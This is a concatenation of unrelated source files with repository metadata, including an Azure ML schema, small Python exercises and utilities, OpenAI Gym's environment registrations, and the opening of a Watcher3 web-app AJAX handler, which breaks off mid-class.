59a36d90be34893265567174228a0d09d2ef132f | bad62c2b0dfad33197db55b44efeec0bab405634 | /sdk/ml/azure-ai-ml/azure/ai/ml/_schema/compute/usage.py | 39e0151c3a84f06270af1fa3cdc4323d144b0afe | [
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"PSF-2.0",
"LGPL-2.0-or-later",
"GPL-3.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"Python-2.0",
"MPL-2.0",
"LicenseRef-scancode-other-copyleft",
"HPND",
"ODbL-1.0",
"GPL-3.0-only",
"ZPL-2.1",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-generic-cla"
]
| permissive | test-repo-billy/azure-sdk-for-python | 20c5a2486456e02456de17515704cb064ff19833 | cece86a8548cb5f575e5419864d631673be0a244 | refs/heads/master | 2022-10-25T02:28:39.022559 | 2022-10-18T06:05:46 | 2022-10-18T06:05:46 | 182,325,031 | 0 | 0 | MIT | 2019-07-25T22:28:52 | 2019-04-19T20:59:15 | Python | UTF-8 | Python | false | false | 1,289 | py | # ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
# pylint: disable=unused-argument,no-self-use
from marshmallow import fields
from marshmallow.decorators import post_load
from azure.ai.ml._restclient.v2021_10_01.models import UsageUnit
from azure.ai.ml._schema.core.fields import NestedField, StringTransformedEnum, UnionField
from azure.ai.ml._schema.core.schema_meta import PatchedSchemaMeta
from azure.ai.ml._utils.utils import camel_to_snake
class UsageNameSchema(metaclass=PatchedSchemaMeta):
value = fields.Str()
localized_value = fields.Str()
@post_load
def make(self, data, **kwargs):
from azure.ai.ml.entities import UsageName
return UsageName(**data)
class UsageSchema(metaclass=PatchedSchemaMeta):
id = fields.Str()
aml_workspace_location = fields.Str()
type = fields.Str()
unit = UnionField(
[
fields.Str(),
StringTransformedEnum(
allowed_values=UsageUnit.COUNT,
casing_transform=camel_to_snake,
),
]
)
current_value = fields.Int()
limit = fields.Int()
name = NestedField(UsageNameSchema)
| [
"[email protected]"
]
| |
bed1f026290d30ab652af5f006794bd8fbc9f765 | c71af56951d1c661a5819db72da1caccd9130df2 | /python/utils/ad_tests_mover.py | 589995b4d3a1d5c721e5c9a0815c477fcb302fc7 | []
| no_license | adrianpoplesanu/personal-work | 2940a0dc4e4e27e0cc467875bae3fdea27dd0d31 | adc289ecb72c1c6f98582f3ea9ad4bf2e8e08d29 | refs/heads/master | 2023-08-23T06:56:49.363519 | 2023-08-21T17:20:51 | 2023-08-21T17:20:51 | 109,451,981 | 0 | 1 | null | 2022-10-07T04:53:24 | 2017-11-03T23:36:21 | Python | UTF-8 | Python | false | false | 457 | py | limit = 95
def format_2digits(i):
if i < 10:
return "test0" + str(i)
else:
return "test" + str(i)
def format_3digits(i):
if i < 10:
return "test00" + str(i)
elif i < 100:
return "test0" + str(i)
else:
return "test" + str(i)
if __name__ == '__main__':
for i in range(1, limit + 1):
print ("mv " + format_2digits(i) + ".ad " + format_3digits(i) + ".ad ;")
print ("echo 'done'")
| [
"[email protected]"
]
| |
ae269fbeb63c445ff3f0b9c7c9b142899a832f1f | f506dc8837e55dc1d8c023360d3395c1d24833e8 | /prepare-dataset.py | 0b3821e4fe3f99018e9f87a64387bf438986a1dc | [
"MIT"
]
| permissive | hommmm/ParallelTTS | 0f82ed29cdad0441ce491987b72ef17027b48359 | d0e967d6d471bc901c85181a3b734d4df445dd08 | refs/heads/main | 2023-04-24T05:34:10.327568 | 2021-04-15T06:37:29 | 2021-04-15T06:37:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,446 | py | #!/usr/bin/env python
"""Download and preprocess datasets. Supported datasets are:
* English female: LJSpeech
* Mandarin female: BBSpeech (BIAOBEI)
* Tibetan female: TBSpeech (Non-public)
* Mongolian male: MBSpeech (Mongolian Bible)
* Korean female: KSSpeech (Kaggle Korean Single Speech)
* Cantonese male: HKSpeech (Common Voice, Hong Kong)
* Japanese female: JPSpeech (JSUT Speech Corpus)
"""
__author__ = 'Atomicoo'
import sys
import os
import os.path as osp
import argparse
import pandas as pd
from utils.hparams import HParam
from utils.utils import download_file
from helpers.processor import Processor
from datasets.dataset import SpeechDataset
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--config', default=None, type=str, help='Config file path')
parser.add_argument('--compute', action='store_true', help='Pre-compute dataset statistics')
args = parser.parse_args()
hparams = HParam(args.config) \
if args.config else HParam(osp.join(osp.abspath(os.getcwd()), 'config', 'default.yaml'))
datasets_path = hparams.data.datasets_path
dataset_file_url = \
f'https://open-speech-data.oss-cn-hangzhou.aliyuncs.com/{hparams.data.dataset_dir}.tar.bz2'
dataset_file_name = osp.basename(dataset_file_url)
dataset_dir = dataset_file_name[:-8]
dataset_path = osp.join(datasets_path, dataset_dir)
wavfile_path = osp.join(dataset_path, "wavs")
melspec_path = osp.join(dataset_path, "mels")
if osp.isdir(melspec_path) and False:
print("%s dataset folder already exists" % dataset_dir)
sys.exit(0)
else:
dataset_file_path = osp.join(datasets_path, dataset_file_name)
if not osp.isfile(dataset_file_path):
download_file(dataset_file_url, dataset_file_path)
else:
print("'%s' already exists" % dataset_file_name)
if not osp.isdir(wavfile_path):
print("extracting '%s'..." % dataset_file_name)
os.system('cd %s; tar xvjf %s' % (datasets_path, dataset_file_name))
else:
print("'%s' already exists" % wavfile_path)
dataset_root = osp.join(hparams.data.datasets_path, hparams.data.dataset_dir)
dataset = SpeechDataset([], dataset_root, hparams.text)
processor = Processor(hparams=hparams.audio)
# pre process/compute
if args.compute:
processor.precompute(dataset_path, dataset)
else:
processor.preprocess(dataset_path, dataset)
| [
"[email protected]"
]
| |
04dc23f98eeb652b65e913bb594e023fbe573c31 | ce0f8956c4c308c67bd700d31fe8d5a17b16ac08 | /Python3/src/14 Testing/TDD/point.py | 5f5392393d0de4173dee22fb7258d9404262882e | []
| no_license | seddon-software/python3 | 795ae8d22a172eea074b71d6cd49d79e388d8cc6 | d5e6db1509a25c1a3040d5ae82d757539a2ff730 | refs/heads/master | 2021-07-10T15:48:31.893757 | 2020-07-16T20:29:22 | 2020-07-16T20:29:22 | 175,872,757 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 283 | py | class Point:
def __init__(self, x0, y0, name):
self.x = x0
self.y = y0
self.name = name
def moveBy(self, dx, dy):
self.x += dx
self.y += dy
def display(self):
print(f"Point {self.name} is at [{self.x},{self.y}]")
| [
"[email protected]"
]
| |
0eed8c89461eb6c3b8d3047d689917d934f242ea | edf125be37a40caeb14c7fe32bd9f7511cf0ce9b | /07-cleaning-data-in-python/5-case-study/checking_data_types.py | dbf0982d7a52005d2ab359bdf31bf73197f34252 | []
| no_license | vedpbharti/Datacamp | 1d3d2ca0722a3a19733e91fa054f64e0c3b7114a | b6d019efebe1b46765f19212ba2d8ebb9d90de57 | refs/heads/master | 2020-04-05T05:47:28.528088 | 2019-02-10T22:34:00 | 2019-02-10T22:34:00 | 156,610,704 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,221 | py | '''Checking the data types
Now that your data is in the proper shape, you need to ensure that the columns are of the proper data type. That is, you need to ensure that country is of type object, year is of type int64, and life_expectancy is of type float64.
The tidy DataFrame has been pre-loaded as gapminder. Explore it in the IPython Shell using the .info() method. Notice that the column 'year' is of type object. This is incorrect, so you'll need to use the pd.to_numeric() function to convert it to a numeric data type.
NumPy and pandas have been pre-imported as np and pd.
Instructions
100 XP
Convert the year column of gapminder using pd.to_numeric().
Assert that the country column is of type np.object. This has been done for you.
Assert that the year column is of type np.int64.
Assert that the life_expectancy column is of type np.float64.'''
# Convert the year column to numeric
gapminder.year = pd.to_numeric(gapminder['year'], errors='coerce')
# Test if country is of type object
assert gapminder.country.dtypes == np.object
# Test if year is of type int64
assert gapminder.year.dtypes == np.int64
# Test if life_expectancy is of type float64
assert gapminder.life_expectancy.dtypes == np.float64
| [
"[email protected]"
]
| |
895a00118a48a46da43842ed361ef90b4bf75bc7 | f023692f73992354a0b7823d9c49ae730c95ab52 | /AtCoderRegularContest/109/B.py | e8f63dd4b86156a7a7784479c9988ed5e778177a | []
| no_license | corutopi/AtCorder_python | a959e733f9a3549fab7162023e414ac2c99c4abe | a2c78cc647076071549e354c398155a65d5e331a | refs/heads/master | 2023-08-31T09:40:35.929155 | 2023-08-20T06:19:35 | 2023-08-20T06:19:35 | 197,030,129 | 1 | 0 | null | 2022-06-22T04:06:28 | 2019-07-15T15:57:34 | Python | UTF-8 | Python | false | false | 694 | py | # import sys
# sys.setrecursionlimit(10 ** 6)
# import bisect
# from collections import deque
def binary_search(ok, ng, solve):
"""2分探索"""
while abs(ok - ng) > 1:
mid = (ok + ng) // 2
if solve(mid):
ok = mid
else:
ng = mid
return ok
# from decorator import stop_watch
#
#
# @stop_watch
def solve(n):
def solve(x):
if (x * (x + 1)) // 2 <= n + 1:
return True
return False
print(n - binary_search(1, n + 1, solve) + 1)
if __name__ == '__main__':
n = int(input())
solve(n)
# # test
# from random import randint
# from func import random_str, random_ints
# solve()
| [
"[email protected]"
]
| |
03c7167733f235f4307297442c65882718598a6e | 7b97d6fef74b35d2f26a9fed79b5b15782f8f9a5 | /examples/basic_example.py | 6ea409ffd7dddf1566fbada82d53d23511f7979b | [
"MIT"
]
| permissive | Edinburgh-Genome-Foundry/tatapov | 22ac8e1fc506267a5d85f6063596485e9fdba9e4 | 06c2aa13e49affc7419e16e853d31c835813fe04 | refs/heads/master | 2023-09-03T22:28:55.443170 | 2022-05-06T13:41:32 | 2022-05-06T13:41:32 | 150,324,605 | 12 | 2 | NOASSERTION | 2020-09-08T23:31:43 | 2018-09-25T20:22:46 | Python | UTF-8 | Python | false | false | 242 | py | import tatapov
data = tatapov.annealing_data["25C"]["01h"]
subset = tatapov.data_subset(data, ["ACGA", "AAAT", "AGAG"], add_reverse=True)
ax, _ = tatapov.plot_data(subset, figwidth=5)
ax.figure.tight_layout()
ax.figure.savefig("example.png") | [
"[email protected]"
]
| |
7ae787bca6218c85ab763ed18d5cc546dd7a9f72 | 866418a05db550487e5eb6f5063f04f1241ccb4a | /example/11/╡┌11.3_1.py | 39c0355ca01e72cc70a9202afd65d0b91cafe609 | []
| no_license | Freshield/LEARN_Python_Crawler | 37cd552de8fb3f30157326a22a6b5cd62bd74703 | 53406cac38c27960e863c7bd5366bd1ae01ecd6c | refs/heads/main | 2023-02-19T00:36:52.548150 | 2021-01-23T03:40:20 | 2021-01-23T03:40:20 | 326,993,103 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | import pymongo
# 创建对象,连接本地数据库。
# 方法一:
client = pymongo.MongoClient()
# 方法二:
client = pymongo.MongoClient('localhost', 27017)
# 方法三:
client = pymongo.MongoClient('mongodb://localhost:27017/')
# 连接DB数据库
db = client['DB']
# 连接集合user,集合类似关系数据库的数据表
# 如果集合不存在,会新建集合user
user_collection = db.user
# 设置文档格式(文档即我们常说的数据)
| [
"[email protected]"
]
| |
4e20e0113f12ca54ff93d7de62bcc9e2d82234cf | bca56a70984c620d0e86be6c03a1e18ce3af2c2c | /gym/envs/__init__.py | 44b07343068c4b239f537eb49b6fd7f81f1eb732 | [
"MIT"
]
| permissive | davidsonic/self_brewed_gym | 9f44f1fc22a7dcf3cfb4a6850cb10dee8c2c2e17 | 4e0cffb3a6aad1f570aa748c22bf6a289aaa1ab3 | refs/heads/master | 2020-04-15T13:23:34.797762 | 2019-01-12T22:46:53 | 2019-01-12T22:46:53 | 164,715,071 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,852 | py | from gym.envs.registration import registry, register, make, spec
# Algorithmic
# ----------------------------------------
register(
id='Copy-v0',
entry_point='gym.envs.algorithmic:CopyEnv',
max_episode_steps=200,
reward_threshold=25.0,
)
register(
id='RepeatCopy-v0',
entry_point='gym.envs.algorithmic:RepeatCopyEnv',
max_episode_steps=200,
reward_threshold=75.0,
)
register(
id='ReversedAddition-v0',
entry_point='gym.envs.algorithmic:ReversedAdditionEnv',
kwargs={'rows' : 2},
max_episode_steps=200,
reward_threshold=25.0,
)
register(
id='ReversedAddition3-v0',
entry_point='gym.envs.algorithmic:ReversedAdditionEnv',
kwargs={'rows' : 3},
max_episode_steps=200,
reward_threshold=25.0,
)
register(
id='DuplicatedInput-v0',
entry_point='gym.envs.algorithmic:DuplicatedInputEnv',
max_episode_steps=200,
reward_threshold=9.0,
)
register(
id='Reverse-v0',
entry_point='gym.envs.algorithmic:ReverseEnv',
max_episode_steps=200,
reward_threshold=25.0,
)
# Classic
# ----------------------------------------
register(
id='CartPole-v0',
entry_point='gym.envs.classic_control:CartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
register(
id='CartPole-v1',
entry_point='gym.envs.classic_control:CartPoleEnv',
max_episode_steps=500,
reward_threshold=475.0,
)
register(
id='MountainCar-v0',
entry_point='gym.envs.classic_control:MountainCarEnv',
max_episode_steps=200,
reward_threshold=-110.0,
)
register(
id='MountainCarContinuous-v0',
entry_point='gym.envs.classic_control:Continuous_MountainCarEnv',
max_episode_steps=999,
reward_threshold=90.0,
)
register(
id='Pendulum-v0',
entry_point='gym.envs.classic_control:PendulumEnv',
max_episode_steps=200,
)
register(
id='Acrobot-v1',
entry_point='gym.envs.classic_control:AcrobotEnv',
max_episode_steps=500,
)
# Box2d
# ----------------------------------------
register(
id='LunarLander-v2',
entry_point='gym.envs.box2d:LunarLander',
max_episode_steps=1000,
reward_threshold=200,
)
register(
id='LunarLanderContinuous-v2',
entry_point='gym.envs.box2d:LunarLanderContinuous',
max_episode_steps=1000,
reward_threshold=200,
)
register(
id='BipedalWalker-v2',
entry_point='gym.envs.box2d:BipedalWalker',
max_episode_steps=1600,
reward_threshold=300,
)
register(
id='BipedalWalkerHardcore-v2',
entry_point='gym.envs.box2d:BipedalWalkerHardcore',
max_episode_steps=2000,
reward_threshold=300,
)
register(
id='CarRacing-v0',
entry_point='gym.envs.box2d:CarRacing',
max_episode_steps=1000,
reward_threshold=900,
)
# Toy Text
# ----------------------------------------
register(
id='Blackjack-v0',
entry_point='gym.envs.toy_text:BlackjackEnv',
)
register(
id='KellyCoinflip-v0',
entry_point='gym.envs.toy_text:KellyCoinflipEnv',
reward_threshold=246.61,
)
register(
id='KellyCoinflipGeneralized-v0',
entry_point='gym.envs.toy_text:KellyCoinflipGeneralizedEnv',
)
register(
id='FrozenLake-v0',
entry_point='gym.envs.toy_text:FrozenLakeEnv',
kwargs={'map_name' : '4x4'},
max_episode_steps=100,
reward_threshold=0.78, # optimum = .8196
)
register(
id='FrozenLake8x8-v0',
entry_point='gym.envs.toy_text:FrozenLakeEnv',
kwargs={'map_name' : '8x8'},
max_episode_steps=200,
reward_threshold=0.99, # optimum = 1
)
register(
id='CliffWalking-v0',
entry_point='gym.envs.toy_text:CliffWalkingEnv',
)
register(
id='NChain-v0',
entry_point='gym.envs.toy_text:NChainEnv',
max_episode_steps=1000,
)
register(
id='Roulette-v0',
entry_point='gym.envs.toy_text:RouletteEnv',
max_episode_steps=100,
)
register(
id='Taxi-v2',
entry_point='gym.envs.toy_text.taxi:TaxiEnv',
reward_threshold=8, # optimum = 8.46
max_episode_steps=200,
)
register(
id='GuessingGame-v0',
entry_point='gym.envs.toy_text.guessing_game:GuessingGame',
max_episode_steps=200,
)
register(
id='HotterColder-v0',
entry_point='gym.envs.toy_text.hotter_colder:HotterColder',
max_episode_steps=200,
)
# Mujoco
# ----------------------------------------
# 2D
register(
id='Reacher-v2',
entry_point='gym.envs.mujoco:ReacherEnv',
max_episode_steps=50,
reward_threshold=-3.75,
)
register(
id='Pusher-v2',
entry_point='gym.envs.mujoco:PusherEnv',
max_episode_steps=100,
reward_threshold=0.0,
)
register(
id='Thrower-v2',
entry_point='gym.envs.mujoco:ThrowerEnv',
max_episode_steps=100,
reward_threshold=0.0,
)
register(
id='Striker-v2',
entry_point='gym.envs.mujoco:StrikerEnv',
max_episode_steps=100,
reward_threshold=0.0,
)
register(
id='InvertedPendulum-v2',
entry_point='gym.envs.mujoco:InvertedPendulumEnv',
max_episode_steps=1000,
reward_threshold=950.0,
)
# debug
register(
id='MyInvertedPendulum-v2',
entry_point='gym.envs.mujoco:MyInvertedPendulumEnv',
max_episode_steps=1000,
reward_threshold=950.0,
)
register(
id='InvertedDoublePendulum-v2',
entry_point='gym.envs.mujoco:InvertedDoublePendulumEnv',
max_episode_steps=1000,
reward_threshold=9100.0,
)
register(
id='HalfCheetah-v2',
entry_point='gym.envs.mujoco:HalfCheetahEnv',
max_episode_steps=1000,
reward_threshold=4800.0,
)
register(
id='Hopper-v2',
entry_point='gym.envs.mujoco:HopperEnv',
max_episode_steps=1000,
reward_threshold=3800.0,
)
register(
id='Swimmer-v2',
entry_point='gym.envs.mujoco:SwimmerEnv',
max_episode_steps=1000,
reward_threshold=360.0,
)
register(
id='Walker2d-v2',
max_episode_steps=1000,
entry_point='gym.envs.mujoco:Walker2dEnv',
)
register(
id='Ant-v2',
entry_point='gym.envs.mujoco:AntEnv',
max_episode_steps=1000,
reward_threshold=6000.0,
)
register(
id='Humanoid-v2',
entry_point='gym.envs.mujoco:HumanoidEnv',
max_episode_steps=1000,
)
register(
id='HumanoidStandup-v2',
entry_point='gym.envs.mujoco:HumanoidStandupEnv',
max_episode_steps=1000,
)
# debug
register(
id='HumanoidStandup-v1',
entry_point='gym.envs.mujoco:HumanoidStandEnv',
max_episode_steps=1000,
)
# Robotics
# ----------------------------------------
def _merge(a, b):
a.update(b)
return a
for reward_type in ['sparse', 'dense']:
suffix = 'Dense' if reward_type == 'dense' else ''
kwargs = {
'reward_type': reward_type,
}
# Fetch
register(
id='FetchSlide{}-v1'.format(suffix),
entry_point='gym.envs.robotics:FetchSlideEnv',
kwargs=kwargs,
max_episode_steps=50,
)
register(
id='FetchPickAndPlace{}-v1'.format(suffix),
entry_point='gym.envs.robotics:FetchPickAndPlaceEnv',
kwargs=kwargs,
max_episode_steps=50,
)
# debug
register(
id='FetchAdv{}-v1'.format(suffix),
entry_point='gym.envs.robotics:FetchAdvEnv',
kwargs=kwargs,
max_episode_steps=50,
)
register(
id='FetchReach{}-v1'.format(suffix),
entry_point='gym.envs.robotics:FetchReachEnv',
kwargs=kwargs,
max_episode_steps=50,
)
register(
id='FetchPush{}-v1'.format(suffix),
entry_point='gym.envs.robotics:FetchPushEnv',
kwargs=kwargs,
max_episode_steps=50,
)
# Hand
register(
id='HandReach{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandReachEnv',
kwargs=kwargs,
max_episode_steps=50,
)
register(
id='HandManipulateBlockRotateZ{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandBlockEnv',
kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'z'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulateBlockRotateParallel{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandBlockEnv',
kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'parallel'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulateBlockRotateXYZ{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandBlockEnv',
kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulateBlockFull{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandBlockEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
# Alias for "Full"
register(
id='HandManipulateBlock{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandBlockEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulateEggRotate{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandEggEnv',
kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulateEggFull{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandEggEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
# Alias for "Full"
register(
id='HandManipulateEgg{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandEggEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulatePenRotate{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandPenEnv',
kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
register(
id='HandManipulatePenFull{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandPenEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
# Alias for "Full"
register(
id='HandManipulatePen{}-v0'.format(suffix),
entry_point='gym.envs.robotics:HandPenEnv',
kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),
max_episode_steps=100,
)
# Atari
# ----------------------------------------
# # print ', '.join(["'{}'".format(name.split('.')[0]) for name in atari_py.list_games()])
for game in ['air_raid', 'alien', 'amidar', 'assault', 'asterix', 'asteroids', 'atlantis',
'bank_heist', 'battle_zone', 'beam_rider', 'berzerk', 'bowling', 'boxing', 'breakout', 'carnival',
'centipede', 'chopper_command', 'crazy_climber', 'demon_attack', 'double_dunk',
'elevator_action', 'enduro', 'fishing_derby', 'freeway', 'frostbite', 'gopher', 'gravitar',
'hero', 'ice_hockey', 'jamesbond', 'journey_escape', 'kangaroo', 'krull', 'kung_fu_master',
'montezuma_revenge', 'ms_pacman', 'name_this_game', 'phoenix', 'pitfall', 'pong', 'pooyan',
'private_eye', 'qbert', 'riverraid', 'road_runner', 'robotank', 'seaquest', 'skiing',
'solaris', 'space_invaders', 'star_gunner', 'tennis', 'time_pilot', 'tutankham', 'up_n_down',
'venture', 'video_pinball', 'wizard_of_wor', 'yars_revenge', 'zaxxon']:
for obs_type in ['image', 'ram']:
# space_invaders should yield SpaceInvaders-v0 and SpaceInvaders-ram-v0
name = ''.join([g.capitalize() for g in game.split('_')])
if obs_type == 'ram':
name = '{}-ram'.format(name)
nondeterministic = False
if game == 'elevator_action' and obs_type == 'ram':
# ElevatorAction-ram-v0 seems to yield slightly
# non-deterministic observations about 10% of the time. We
# should track this down eventually, but for now we just
# mark it as nondeterministic.
nondeterministic = True
register(
id='{}-v0'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type, 'repeat_action_probability': 0.25},
max_episode_steps=10000,
nondeterministic=nondeterministic,
)
register(
id='{}-v4'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type},
max_episode_steps=100000,
nondeterministic=nondeterministic,
)
# Standard Deterministic (as in the original DeepMind paper)
if game == 'space_invaders':
frameskip = 3
else:
frameskip = 4
# Use a deterministic frame skip.
register(
id='{}Deterministic-v0'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type, 'frameskip': frameskip, 'repeat_action_probability': 0.25},
max_episode_steps=100000,
nondeterministic=nondeterministic,
)
register(
id='{}Deterministic-v4'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type, 'frameskip': frameskip},
max_episode_steps=100000,
nondeterministic=nondeterministic,
)
register(
id='{}NoFrameskip-v0'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type, 'frameskip': 1, 'repeat_action_probability': 0.25}, # A frameskip of 1 means we get every frame
max_episode_steps=frameskip * 100000,
nondeterministic=nondeterministic,
)
# No frameskip. (Atari has no entropy source, so these are
# deterministic environments.)
register(
id='{}NoFrameskip-v4'.format(name),
entry_point='gym.envs.atari:AtariEnv',
kwargs={'game': game, 'obs_type': obs_type, 'frameskip': 1}, # A frameskip of 1 means we get every frame
max_episode_steps=frameskip * 100000,
nondeterministic=nondeterministic,
)
# Unit test
# ---------
register(
id='CubeCrash-v0',
entry_point='gym.envs.unittest:CubeCrash',
reward_threshold=0.9,
)
register(
id='CubeCrashSparse-v0',
entry_point='gym.envs.unittest:CubeCrashSparse',
reward_threshold=0.9,
)
register(
id='CubeCrashScreenBecomesBlack-v0',
entry_point='gym.envs.unittest:CubeCrashScreenBecomesBlack',
reward_threshold=0.9,
)
register(
id='MemorizeDigits-v0',
entry_point='gym.envs.unittest:MemorizeDigits',
reward_threshold=20,
)
| [
"[email protected]"
]
| |
3ecb8306c4120d34f4d50837b65d730ed957c23e | df04a39be0cb31fa66a084afa2a4c161839d8d88 | /core/ajax.py | 735c1792f36a713211835a1a5e8c3cfca7979354 | [
"Apache-2.0"
]
| permissive | skyle97/Watcher3 | 58e95febbd81608e9de8ce5486c62c0ec45958d7 | 3eaee90069caee3a7fbff096184de33ad97fe7f3 | refs/heads/master | 2021-01-19T17:10:32.147456 | 2017-08-21T02:43:34 | 2017-08-21T02:43:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,912 | py | import json
import logging
import os
import threading
import time
import cherrypy
import datetime
import core
from core import config, library, searchresults, searcher, snatcher, version, movieinfo, notification, plugins
from core.providers import torrent, newznab
from core.downloaders import nzbget, sabnzbd, transmission, qbittorrent, deluge, rtorrent, blackhole
from core.helpers import Conversions
from core.rss import predb
import backup
from gettext import gettext as _
logging = logging.getLogger(__name__)
class Errors():
''' Namespace for common error messages used in AJAX responses '''
database_write = _('Unable to write to database.')
database_read = _('Unable to read {} details from database.')
tmdb_not_found = _('Unable to find {} on TheMovieDB.')
class Ajax(object):
''' These are all the methods that handle ajax post/get requests from the browser.
Except in special circumstances, all should return an 'ajax-style response', which is a
dict with a response key to indicate success, and additional keys for expected data output.
For example {'response': False, 'error': 'something broke'}
{'response': True, 'results': ['this', 'is', 'the', 'output']}
'''
def __init__(self):
self.tmdb = movieinfo.TMDB()
self.config = config.Config()
self.metadata = library.Metadata()
self.predb = predb.PreDB()
self.searcher = searcher.Searcher()
self.score = searchresults.Score()
self.snatcher = snatcher.Snatcher()
self.version = version.Version()
@cherrypy.expose
@cherrypy.tools.json_out()
def library(self, sort_key, sort_direction, limit=50, offset=0):
''' Get 50 movies from library
sort_key (str): column name to sort by
sort_direction (str): direction to sort [ASC, DESC]
limit: int number of movies to get <optional - default 50>
offset: int list index postition to start slice <optional - default 0>
Gets a 25-movie slice from library sorted by sort key
Returns list of dicts of movies
'''
return core.sql.get_user_movies(sort_key, sort_direction.upper(), limit, offset, hide_finished=core.CONFIG['Server']['hidefinished'])
@cherrypy.expose
@cherrypy.tools.json_out()
def search_tmdb(self, search_term):
''' Search tmdb for movies
search_term (str): title and year of movie (Movie Title 2016)
Returns str json-encoded list of dicts that contain tmdb's data.
'''
results = self.tmdb.search(search_term)
if not results:
logging.info('No Results found for {}'.format(search_term))
return results
@cherrypy.expose
@cherrypy.tools.json_out()
def get_search_results(self, imdbid, quality=None):
''' Gets search results for movie
imdbid (str): imdb id #
quality (str): quality profile for movie <optional - default None>
Passes request to sql.get_search_results() then filters out unused download methods.
Returns dict ajax-style response
'''
results = core.sql.get_search_results(imdbid, quality=quality)
if not core.CONFIG['Downloader']['Sources']['usenetenabled']:
results = [res for res in results if res.get('type') != 'nzb']
if not core.CONFIG['Downloader']['Sources']['torrentenabled']:
results = [res for res in results if res.get('type') != 'torrent']
if not results:
return {'response': False, 'next': Conversions.human_datetime(core.NEXT_SEARCH)}
else:
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
return {'response': True, 'results': results}
@cherrypy.expose
def get_trailer(self, title, year):
''' Gets trailer embed url from youtube
title (str): title of movie
year (str/int): year of movie release
Returns str
'''
return movieinfo.trailer('{} {}'.format(title, year))
@cherrypy.expose
@cherrypy.tools.json_out()
def add_wanted_movie(self, data):
''' Adds movie to library
data (str): json-formatted dict of known movie data
Calls library.Manage.add_movie to add to library.
Returns dict ajax-style response
'''
movie = json.loads(data)
return core.manage.add_movie(movie, full_metadata=False)
@cherrypy.expose
@cherrypy.tools.json_out()
def save_settings(self, data):
''' Saves settings to config file
data (dict): of Section with nested dict of keys and values:
{'Section': {'key': 'val', 'key2': 'val2'}, 'Section2': {'key': 'val'}}
All dicts must contain the full tree or data will be lost.
Fires off additional methods if neccesary, ie scheduler restart/reloads
Returns dict ajax-style response
'''
logging.info('Saving settings.')
data = json.loads(data)
save_data = {}
for key in data:
if data[key] != core.CONFIG[key]:
save_data[key] = data[key]
if not save_data:
return {'response': True, 'message': _('Settings saved.')}
try:
self.config.write(save_data)
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Writing config.', exc_info=True)
return {'response': False, 'error': _('Unable to write to config file.')}
return {'response': True, 'message': _('Settings saved.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def remove_movie(self, imdbid):
''' Removes movie
imdbid (str): imdb id #
Returns dict ajax-style response
'''
return core.manage.remove_movie(imdbid)
@cherrypy.expose
@cherrypy.tools.json_out()
def delete_movie_file(self, imdbid):
''' Deletes movie file for imdbid
imdbid (str): imdb id #
Returns dict ajax-style response
'''
logging.info('Deleting file for {}.'.format(imdbid))
f = core.sql.get_movie_details('imdbid', imdbid).get('finished_file')
try:
logging.debug('Finished file for {} is {}'.format(imdbid, f))
os.unlink(f)
return {'response': True, 'message': _('Deleted movie file {}.').format(f)}
except Exception as e:
logging.error('Unable to delete file {}'.format(f), exc_info=True)
return {'response': False, 'error': str(e)}
@cherrypy.expose
@cherrypy.tools.json_out()
